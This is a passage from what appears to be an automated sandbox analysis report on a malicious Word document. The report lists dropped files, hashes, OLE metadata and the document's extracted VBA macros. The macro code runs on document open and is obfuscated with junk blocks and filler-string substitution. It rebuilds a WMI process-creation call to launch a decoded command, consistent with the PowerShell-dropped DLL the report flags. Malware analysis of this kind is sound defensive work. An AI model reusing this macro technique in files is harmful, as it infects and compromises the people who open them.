Preview:	L..................F.... ....D..{...D..{.....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....;R1A .ARCH_2~1.DOC..R.......Q.y.Q.y...8.....................A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.......\|...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\ARCH_25_012021.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9F.C...........[D_

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.211348644823317
Encrypted:	false
SSDEEP:	3:M1+qbl8WdblmX1+qblv:M4qbrdbPqb1
MD5:	EF242110122D8695A53B38974D63C306
SHA1:	F74EF8F7E90EF2B664F03FC482D2F1526159AC48
SHA-256:	320FBB51CEDFAE2FA1371AAD0622E8A5333C66EBE13A89A21B19789A0739B236
SHA-512:	B2AE3AEC71C0575957AA19EC1A9BE9DE587D7E3DF8345129972B98873B028512FE1CA0C31893FB589ACC12235CBA451563E66B6B2AFD00908074C4D0C79C7C8A
Malicious:	false
Preview:	[doc]..ARCH_25_012021.LNK=0..ARCH_25_012021.LNK=0..[doc]..ARCH_25_012021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGZZKPEW76Z29NVBJ16Y.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5815598878092376
Encrypted:	false
SSDEEP:	96:chQCsMqbqvsqvJCwo6z8hQCsMqbqvsEHyqvJCworUzkCYkHhf8RqlUV4Iu:cy+o6z8yWHnorUzkwf8R+Iu
MD5:	495C21C9F44F74A23210A1F8B666074A
SHA1:	BADCFBEE9A435173F7564DF70C8C806ADD89EB0C
SHA-256:	461F1E4BB3FED6EA8A0B1BC71BD4A520C16BACC99ED580A39ADB55D8EB321C42
SHA-512:	9BC7AC57EB9C9A06FCE015C6D49A7864F9030BDFBAFA7C2558ED7249287B2ACA5D605528826E23E0B6993FFDA1E967C0A1F461E2D45A866D21A1DB94BB297553
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$CH_25_012021.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\Kaktksw\An6othh\N49I.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	631808
Entropy (8bit):	6.9127096471964675
Encrypted:	false
SSDEEP:	12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
MD5:	E09F65C1A92653035B27E603980CB205
SHA1:	78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
SHA-256:	D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
SHA-512:	5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: Arch_2021_717-1562532.doc, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur alias aut sint sequi facilis., Author: Sebastian Melgar, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
Entropy (8bit):	6.658685583484107
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	ARCH_25_012021.doc
File size:	175104
MD5:	baedc37e68b58765fa52c73d0fd2c2d5
SHA1:	2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:	94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
SHA512:	d0043f410e6b5aeb4aa07d331dcfb00977ee90471b5196a5d1431ddb3a5221f42546d9ed895c5b98ca649662468632289ccea2ec1ec5fda4269bb100414ad287
SSDEEP:	1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFkBnyAZ:+TdcrrXyQBsc0vWJVi4IrwVSBH
File Content Preview:	........................>................................... ..................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "ARCH_25_012021.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:	Tenetur alias aut sint sequi facilis.
Subject:
Author:	Sebastian Melgar
Keywords:
Comments:
Template:
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-25 09:28:00
Last Saved Time:	2021-01-25 09:28:00
Number of Pages:	1
Number of Words:	5622
Number of Characters:	32047
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	267
Number of Paragraphs:	75
Thumbnail Scaling Desired:	False
Company:	Orta S.L.
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173

General
Stream Path:	Macros/VBA/A5ate73kc6cw5njy
VBA File Name:	A5ate73kc6cw5njy
Stream Size:	1173
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n < . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 de 6e 3c 87 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Name
VB_Creatable
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "A5ate73kc6cw5njy"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Swrnfbrhhv1hn8ci80
End Sub

VBA File Name: Gusca95luq_, Stream Size: 14646

General
Stream Path:	Macros/VBA/Gusca95luq_
VBA File Name:	Gusca95luq_
Stream Size:	14646
Data ASCII:	. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 de 6e b6 8e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
uldHRAc
BJMbZuJRF
xBaZq)
Const
BvPhx
PTpduh
prhgQCFm
Error
Split(urqwC,
IKEyYJ
cHCfACCC()
fsCkG
ndrons
Split(HYqcb,
Split(fsCkG,
lHXavB
DunxEHX
Split(sHhQm,
WPKmFe
ixJTYF
dFuMF
RcxFVMDOH()
vEmIAMH
BvPhx)
RcxFVMDOH
clPKFBjz
SzdUE
HIXwxDo
urqwC
BJMbZuJRF)
LnRqcjdHC
lhhIDAA)
mnSyJHAv()
JaknVR)
Split(WPKmFe,
JtcSFJR()
xBaZq
AQJEzpnoG
mxkikw
Array((qtNpWFzCE),
SVfwH)
DObDSSSH
"ndpns
kWUSef
mnSyJHAv
IkIlHED)
yNpnD
riWqFGJY
pqwm,
lrUBAA
TjMQdBBgE
ZJSnRBDm)
espWEuWIh
JjJbB
sHhQm
OOobG
OOobG()
CNUcG
Split(nvNjhAFA,
Array((eBzEFGPxh),
uZukAmEA
qtNpWFzCE
Array((KAAmsFJLa),
Range:
eGHABDHYI
Array((LpCFBdE),
"high,critic"
WzIrJQJ
tWLOCW
Array((yNpnD),
xjjUNmJ
WiAHIOige
vEmIAMH:
VHxfT
kXidGGmrk()
DGpFCB
mjbBYHhbs
wJdJAI)
Array((dvuZzGDnA),
Split(DSEaFYQ,
DGpFCB()
Split(rSrZBJJv,
otHyDQA
ZJSnRBDm
String
sujuoHFCJ
YtjFBe:
aACrBzCHd
PEoELvIQJ()
Array((cyDODgZgJ),
kRgnIQJCn
SVfwH
rSrZBJJv
zYRcUHEHG
prhgQCFm:
Split(XlUFJHR,
Nothing
Split(sujuoHFCJ,
VcboAE
XpIXCDhMq
ArMYJEkJb:
fEDGCAg
PASRFGECE
PASRFGECE()
ctRAim
jyxYAFLC
QFAdJG:
Array((muQUuJD),
eBzEFGPxh
Split(ctRAim,
vDIdCwGfT
Split(XpIXCDhMq,
PCtZE)
yPcgGA
NYPQCHF
ZDKqIFEBG()
nd:wns
OwqxzJE)
kXidGGmrk
xfQswJFE
Resume
tCOXBDEPL
VHxfT:
OwqxzJE
ortGB
NFoIZAgdj
DunxEHX()
wJdJAI
ifTgDoG)
hxzoFBtLC
HYqcb
Split(fEDGCAg,
PwyZCI
ndgmns
NGzByr
ffeODEi:
PTpduh:
jzCVAIVG
cpeHA
UTlaBhGD:
nEsTCdYDH
Array((huVBjtENv),
ndinns
elqXMZ:
xnvME()
HKXrDBEI
JaknVR
Array((jyxYAFLC),
Mid(skuwd,
Target)
bpMND
LXXQDDfJ
PCtZE
Split(TjMQdBBgE,
AQJEzpnoG:
gvcgAIUM
sOfSqNO
tCOXBDEPL()
MhDEGJ()
NGzByr:
ortGB:
pNdoqWCxt)
SbmMCGuEY
zYRcUHEHG:
IOPMfG()
nvNjhAFA
elqXMZ
Array((DObDSSSH),
Split(NvjyW,
JvTSZI
IkIlHED
ffeODEi
XlUFJHR
DSEaFYQ
AQOwDFGF
UTlaBhGD
UsjaB
ndmns
WiAHIOige:
Attribute
IUHjJ
uZukAmEA()
NYPQCHF)
Split(riWqFGJY,
PmuwJBJH
LpCFBdE
IOPMfG
ndsns
aACrBzCHd()
Array((eGHABDHYI),
huVBjtENv
Array((SbmMCGuEY),
Array((xfQswJFE),
ZDKqIFEBG
DKUOJzi
kWUSef:
cyDODgZgJ
KAAmsFJLa
VB_Name
CNUcG()
wdpnM
Content
Array((dFuMF),
Split(VcboAE,
tWLOCW()
dvuZzGDnA
Split(cpeHA,
Function
xnvME
JtcSFJR
ixJTYF)
Array((IKEyYJ),
VZWOFv()
AQOwDFGF:
oAcbS
tuLCMCI
JvTSZI:
cjdFFEGu
hxzoFBtLC)
rykKLTfBV
HsRXzxA
ndtns
FGWgu
VZWOFv
YtjFBe
nd_ns
dBZlAG)
Array((WzIrJQJ),
Array((zHRlEdEP),
cHCfACCC
Len(skuwd))
ifTgDoG
QFAdJG
Array((SzdUE),
PEoELvIQJ
Array((bpMND),
NFoIZAgdj)
Split(sOfSqNO,
pNdoqWCxt
Split(PmuwJBJH,
ArMYJEkJb
UsjaB)
lhhIDAA
MhDEGJ
zHRlEdEP
muQUuJD
Mid(Application.Name,
Array((jzCVAIVG),
Split(JjJbB,
LnRqcjdHC:
NvjyW
String:
uldHRAc)
PdrYYCtJ
IUHjJ:
otHyDQA()
yPcgGA)
HsRXzxA:
skuwd
dBZlAG

VBA Code

Attribute VB_Name = "Gusca95luq_"
Function Swrnfbrhhv1hn8ci80()
   GoTo IUHjJ
    Const LpCFBdE As String = "A"
    Const BvPhx As String = ","
    Const XlUFJHR As String = "*high*,*critic*"
    Dim HIXwxDo As Range: Set HIXwxDo = Array((LpCFBdE), Target)
    If HIXwxDo Is Nothing Then
    End If
    Dim tCOXBDEPL() As String: tCOXBDEPL = Split(XlUFJHR, BvPhx)
IUHjJ:
skuwd = E1eikun_vqz38wvur + A5ate73kc6cw5njy . Content + Sbgh3kd2dneltk
   GoTo elqXMZ
    Const zHRlEdEP As String = "A"
    Const uldHRAc As String = ","
    Const rSrZBJJv As String = "*high*,*critic*"
    Dim DKUOJzi As Range: Set DKUOJzi = Array((zHRlEdEP), Target)
    If DKUOJzi Is Nothing Then
    End If
    Dim DGpFCB() As String: DGpFCB = Split(rSrZBJJv, uldHRAc)
elqXMZ:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
Rjwqx5pa0bii0zjv0 = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
   GoTo prhgQCFm
    Const bpMND As String = "A"
    Const ixJTYF As String = ","
    Const nvNjhAFA As String = "*high*,*critic*"
    Dim vDIdCwGfT As Range: Set vDIdCwGfT = Array((bpMND), Target)
    If vDIdCwGfT Is Nothing Then
    End If
    Dim PASRFGECE() As String: PASRFGECE = Split(nvNjhAFA, ixJTYF)
prhgQCFm:
Wti36fxa67_iliapeg = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
   GoTo vEmIAMH
    Const eGHABDHYI As String = "A"
    Const wJdJAI As String = ","
    Const DSEaFYQ As String = "*high*,*critic*"
    Dim PdrYYCtJ As Range: Set PdrYYCtJ = Array((eGHABDHYI), Target)
    If PdrYYCtJ Is Nothing Then
    End If
    Dim DunxEHX() As String: DunxEHX = Split(DSEaFYQ, wJdJAI)
vEmIAMH:
Qcpt8n14rllbi98 = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
   GoTo ffeODEi
    Const eBzEFGPxh As String = "A"
    Const UsjaB As String = ","
    Const sujuoHFCJ As String = "*high*,*critic*"
    Dim kRgnIQJCn As Range: Set kRgnIQJCn = Array((eBzEFGPxh), Target)
    If kRgnIQJCn Is Nothing Then
    End If
    Dim uZukAmEA() As String: uZukAmEA = Split(sujuoHFCJ, UsjaB)
ffeODEi:
Sq3vjdsxcq9piizr = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
   GoTo zYRcUHEHG
    Const xfQswJFE As String = "A"
    Const lhhIDAA As String = ","
    Const fEDGCAg As String = "*high*,*critic*"
    Dim xjjUNmJ As Range: Set xjjUNmJ = Array((xfQswJFE), Target)
    If xjjUNmJ Is Nothing Then
    End If
    Dim VZWOFv() As String: VZWOFv = Split(fEDGCAg, lhhIDAA)
zYRcUHEHG:
B8ot8fduc6wr = Qcpt8n14rllbi98 + Sq3vjdsxcq9piizr + Wti36fxa67_iliapeg + mjbBYHhbs + Rjwqx5pa0bii0zjv0
   GoTo QFAdJG
    Const yNpnD As String = "A"
    Const ifTgDoG As String = ","
    Const JjJbB As String = "*high*,*critic*"
    Dim tuLCMCI As Range: Set tuLCMCI = Array((yNpnD), Target)
    If tuLCMCI Is Nothing Then
    End If
    Dim aACrBzCHd() As String: aACrBzCHd = Split(JjJbB, ifTgDoG)
QFAdJG:
J8zona45gf3qr0 = K2eqcmojfn8ix90d6(B8ot8fduc6wr)
   GoTo AQJEzpnoG
    Const qtNpWFzCE As String = "A"
    Const JaknVR As String = ","
    Const riWqFGJY As String = "*high*,*critic*"
    Dim lHXavB As Range: Set lHXavB = Array((qtNpWFzCE), Target)
    If lHXavB Is Nothing Then
    End If
    Dim IOPMfG() As String: IOPMfG = Split(riWqFGJY, JaknVR)
AQJEzpnoG:
Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0)
   GoTo YtjFBe
    Const KAAmsFJLa As String = "A"
    Const NFoIZAgdj As String = ","
    Const sOfSqNO As String = "*high*,*critic*"
    Dim espWEuWIh As Range: Set espWEuWIh = Array((KAAmsFJLa), Target)
    If espWEuWIh Is Nothing Then
    End If
    Dim ZDKqIFEBG() As String: ZDKqIFEBG = Split(sOfSqNO, NFoIZAgdj)
YtjFBe:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = K2eqcmojfn8ix90d6(mxkikw)
   GoTo LnRqcjdHC
    Const muQUuJD As String = "A"
    Const xBaZq As String = ","
    Const urqwC As String = "*high*,*critic*"
    Dim rykKLTfBV As Range: Set rykKLTfBV = Array((muQUuJD), Target)
    If rykKLTfBV Is Nothing Then
    End If
    Dim xnvME() As String: xnvME = Split(urqwC, xBaZq)
LnRqcjdHC:
Jdm74rzs4y2p2zfm_u.Create pqwm, Alvw54nlrq0k5fkzbc, Y10e4jw1j3djjv0vy_
   GoTo HsRXzxA
    Const IKEyYJ As String = "A"
    Const dBZlAG As String = ","
    Const HYqcb As String = "*high*,*critic*"
    Dim nEsTCdYDH As Range: Set nEsTCdYDH = Array((IKEyYJ), Target)
    If nEsTCdYDH Is Nothing Then
    End If
    Dim PEoELvIQJ() As String: PEoELvIQJ = Split(HYqcb, dBZlAG)
HsRXzxA:
End Function
Function K2eqcmojfn8ix90d6(R3q4in34ym5v2il)
On Error Resume Next
   GoTo VHxfT
    Const jyxYAFLC As String = "A"
    Const BJMbZuJRF As String = ","
    Const XpIXCDhMq As String = "*high*,*critic*"
    Dim LXXQDDfJ As Range: Set LXXQDDfJ = Array((jyxYAFLC), Target)
    If LXXQDDfJ Is Nothing Then
    End If
    Dim kXidGGmrk() As String: kXidGGmrk = Split(XpIXCDhMq, BJMbZuJRF)
VHxfT:
Iuykcdayu0ux2dsn = R3q4in34ym5v2il
   GoTo UTlaBhGD
    Const jzCVAIVG As String = "A"
    Const pNdoqWCxt As String = ","
    Const WPKmFe As String = "*high*,*critic*"
    Dim clPKFBjz As Range: Set clPKFBjz = Array((jzCVAIVG), Target)
    If clPKFBjz Is Nothing Then
    End If
    Dim otHyDQA() As String: otHyDQA = Split(WPKmFe, pNdoqWCxt)
UTlaBhGD:
Pk_5b3ebff5osp = Qbtcycloqlj79qjl(Iuykcdayu0ux2dsn)
   GoTo AQOwDFGF
    Const SzdUE As String = "A"
    Const SVfwH As String = ","
    Const fsCkG As String = "*high*,*critic*"
    Dim FGWgu As Range: Set FGWgu = Array((SzdUE), Target)
    If FGWgu Is Nothing Then
    End If
    Dim cHCfACCC() As String: cHCfACCC = Split(fsCkG, SVfwH)
AQOwDFGF:
K2eqcmojfn8ix90d6 = Pk_5b3ebff5osp
   GoTo ortGB
    Const cyDODgZgJ As String = "A"
    Const yPcgGA As String = ","
    Const cpeHA As String = "*high*,*critic*"
    Dim oAcbS As Range: Set oAcbS = Array((cyDODgZgJ), Target)
    If oAcbS Is Nothing Then
    End If
    Dim RcxFVMDOH() As String: RcxFVMDOH = Split(cpeHA, yPcgGA)
ortGB:
End Function
Function Qbtcycloqlj79qjl(Uyflg5ryl7s4km2pbn)
   GoTo kWUSef
    Const WzIrJQJ As String = "A"
    Const NYPQCHF As String = ","
    Const TjMQdBBgE As String = "*high*,*critic*"
    Dim gvcgAIUM As Range: Set gvcgAIUM = Array((WzIrJQJ), Target)
    If gvcgAIUM Is Nothing Then
    End If
    Dim CNUcG() As String: CNUcG = Split(TjMQdBBgE, NYPQCHF)
kWUSef:
   GoTo WiAHIOige
    Const DObDSSSH As String = "A"
    Const PCtZE As String = ","
    Const PmuwJBJH As String = "*high*,*critic*"
    Dim lrUBAA As Range: Set lrUBAA = Array((DObDSSSH), Target)
    If lrUBAA Is Nothing Then
    End If
    Dim MhDEGJ() As String: MhDEGJ = Split(PmuwJBJH, PCtZE)
WiAHIOige:
   GoTo PTpduh
    Const dFuMF As String = "A"
    Const IkIlHED As String = ","
    Const ctRAim As String = "*high*,*critic*"
    Dim PwyZCI As Range: Set PwyZCI = Array((dFuMF), Target)
    If PwyZCI Is Nothing Then
    End If
    Dim tWLOCW() As String: tWLOCW = Split(ctRAim, IkIlHED)
PTpduh:
Qbtcycloqlj79qjl = Replace(Uyflg5ryl7s4km2pbn, "ns w" + "u db nd", Zqvivtw592lxn)
   GoTo NGzByr
    Const huVBjtENv As String = "A"
    Const hxzoFBtLC As String = ","
    Const sHhQm As String = "*high*,*critic*"
    Dim wdpnM As Range: Set wdpnM = Array((huVBjtENv), Target)
    If wdpnM Is Nothing Then
    End If
    Dim JtcSFJR() As String: JtcSFJR = Split(sHhQm, hxzoFBtLC)
NGzByr:
   GoTo ArMYJEkJb
    Const SbmMCGuEY As String = "A"
    Const OwqxzJE As String = ","
    Const NvjyW As String = "*high*,*critic*"
    Dim cjdFFEGu As Range: Set cjdFFEGu = Array((SbmMCGuEY), Target)
    If cjdFFEGu Is Nothing Then
    End If
    Dim mnSyJHAv() As String: mnSyJHAv = Split(NvjyW, OwqxzJE)
ArMYJEkJb:
   GoTo JvTSZI
    Const dvuZzGDnA As String = "A"
    Const ZJSnRBDm As String = ","
    Const VcboAE As String = "*high*,*critic*"
    Dim HKXrDBEI As Range: Set HKXrDBEI = Array((dvuZzGDnA), Target)
    If HKXrDBEI Is Nothing Then
    End If
    Dim OOobG() As String: OOobG = Split(VcboAE, ZJSnRBDm)
JvTSZI:
End Function

VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704

General
Stream Path:	Macros/VBA/Zcf1kk3t2ssv4r07m
VBA File Name:	Zcf1kk3t2ssv4r07m
Stream Size:	704
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 de 6e eb 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Zcf1kk3t2ssv4r07m"`

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 304

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	304
Entropy:	2.82977037235
Base64 Encoded:	False
